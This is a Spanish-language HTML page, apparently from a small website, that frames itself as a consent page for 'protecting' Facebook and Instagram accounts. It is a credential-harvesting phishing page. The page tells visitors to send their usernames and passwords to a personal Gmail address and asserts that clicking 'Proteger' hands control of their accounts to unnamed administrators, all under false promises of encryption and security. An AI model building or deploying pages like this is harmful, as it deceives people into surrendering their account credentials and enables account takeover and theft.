<!DOCTYPE html>
<html lang="en">
<head>
    <meta charset="UTF-8">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <title>Document</title>
</head>
<body>
    <div class="contenedor">
        <h2>Consentimiento para manejar tus cuentas de Facebook e Instagram</h2>
        <p>Para registrar tu cuenta de Instagram o Facebook solo debes colocar en la pestaña de inicio de seccion tu usuario y contraseña con la que te registras en cualquiera de las dos.
            Luego de eso solo presiona en el botón "Proteger" que te mandara a tu cuenta de correo, en donde aparacera un correo destino en el cual apareceran los datos que ingresaste, verifica que son correctos, antes de enviarlos a la base de datos, especifica si es de facebook o instagram, luego de especificar cual es, puedes enviarlos correctamente tus datos,
            dicho correo esta conectado directamente a la base de datos, tanto tu usuario como contraseña seran encriptados para que otro que quiera ingresar sin tu consentimiento
            no pueda.
            Para que estes mas seguro el correo destino al cual de debe enviar es este : datosbase844@gmail.com
            El administrador jefe, debe revisar el estado de tu cuenta para asegurarse y garantizarte de que tu cuentas tienen toda la seguridad que tenemos para ofrecerte.
        </p>
        <p>Al hacer clic en el botón "Proteger", estás otorgando consentimiento para que nosotros, como administradores, tengamos la responsabilidad de administrar tus cuentas de Facebook e Instagram.</p>
        <p>Entendemos la importancia de la privacidad y la seguridad de tus cuentas en redes sociales. Nos comprometemos a utilizar tus cuentas con responsabilidad y a proteger tu información personal.</p>
        <p>Si estás de acuerdo con estos términos, por favor, haz clic en el botón "Volver" para continuar con el registro de tus cuentas.</p>
        <div>
            <button onclick="location.href='index.html'">Volver</button>

        <a href="index.html"></a>
    </div></div>
    <style>
        body{
            background: black;
        }
    .contenedor {
    text-align: center;
    max-width: 600px; 
    margin: 0 auto; 
    padding: 20px;
}

h2 {
    color: #fdfbfb;
}

p {
    color: white;
    margin-bottom: 15px; 
}

button {
    background-color: #007bff;
    color: #fff;
    border: none;
    padding: 10px 20px;
    font-size: 16px;
    cursor: pointer;
    transition: background-color 0.3s;
}

button:hover {
    background-color: #0056b3;
}

a {
    color: #007bff;
    text-decoration: none;
    display: block;
    margin-top: 15px;
}

    </style>
</body>
</html>